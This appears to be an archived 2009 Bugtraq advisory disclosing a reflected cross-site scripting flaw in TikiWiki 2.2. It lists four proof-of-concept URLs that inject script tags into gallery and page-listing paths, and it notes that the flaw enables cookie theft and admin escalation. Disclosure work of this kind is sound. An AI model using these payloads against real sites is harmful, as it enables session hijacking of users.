TikiWiki 2.2 XSS Vulnerability in URI

From: iliz-z@yandex.rui
To: bugtraq@securityfocus.com
Cc:
Subject: TikiWiki 2.2 XSS Vulnerability in URI
Date:


Application: TikiWiki
Version: 2.2 (latest)
Website: www.tikiwiki.org

Bug: Active XSS in URI

Exploitation: Remote
Date: 12 Mar 2009

Discovered by: iliz
Author: iliz
Contact: e-mail: iliz-z(at)yandex(dot)ru

Bug Description:
TikiWiki version 2.2 and later uses URI in html response body and fails to sanitize it. Is therefore prune to Active XSS attack.

PROOF OF CONCEPT:
/tiki-galleries.php/>"><Script>alert(1)</scRipt>
/tiki-list_file_gallery.php/>"><Script>alert(2)</scRipt>
/tiki-listpages.php/>"><Script>alert(3)</scRipt>
/tiki-orphan_pages.php/>"><Script>alert(4)</scRipt>

The javascript code will be executed in the context of the victim's
browser, this can be exploited to steal cookies and escalate
privileges to administrator.

Tested with TikiWiki 2.2, Apache 2.2, Mozilla Firefox 3.0.6, InternetExplorer 7, Opera 9.65







Copyright © 1995-2020 LinuxRocket.net. All rights reserved.